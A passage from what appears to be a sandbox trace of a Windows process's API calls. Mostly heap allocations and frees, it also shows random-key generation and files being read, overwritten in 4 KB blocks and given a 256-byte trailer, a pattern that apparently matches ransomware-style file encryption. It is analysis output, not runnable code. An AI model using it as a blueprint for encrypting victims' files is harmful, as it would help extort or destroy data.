RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.151] GetProcessHeap () returned 0x280000 [0078.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.151] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.152] GetProcessHeap () returned 0x280000 [0078.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.152] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.153] GetProcessHeap () returned 0x280000 [0078.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.154] GetProcessHeap () returned 0x280000 [0078.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.155] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.155] WriteFile (in: hFile=0x834, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.155] WriteFile (in: hFile=0x834, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.155] GetProcessHeap () returned 0x280000 [0078.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.155] CloseHandle (hObject=0x834) returned 1 [0078.164] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 43 [0078.164] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.164] ReadFile (in: hFile=0x838, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.164] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.164] GetProcessHeap () returned 0x280000 [0078.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.164] GetProcessHeap () returned 0x280000 [0078.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0078.165] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0078.165] GetProcessHeap () returned 0x280000 [0078.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0078.165] ReadFile (in: hFile=0x838, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.230] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.231] WriteFile (in: hFile=0x838, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.231] GetProcessHeap () returned 0x280000 [0078.231] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.232] GetProcessHeap () returned 0x280000 [0078.232] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.232] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.233] GetProcessHeap () returned 0x280000 [0078.233] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.233] GetProcessHeap () returned 0x280000 [0078.234] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.234] GetProcessHeap () returned 0x280000 [0078.234] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.234] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.235] GetProcessHeap () returned 0x280000 [0078.235] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.236] GetProcessHeap () returned 0x280000 [0078.236] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.236] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.236] WriteFile (in: hFile=0x838, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.237] WriteFile (in: hFile=0x838, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0078.237] GetProcessHeap () returned 0x280000 [0078.237] HeapFree (in: 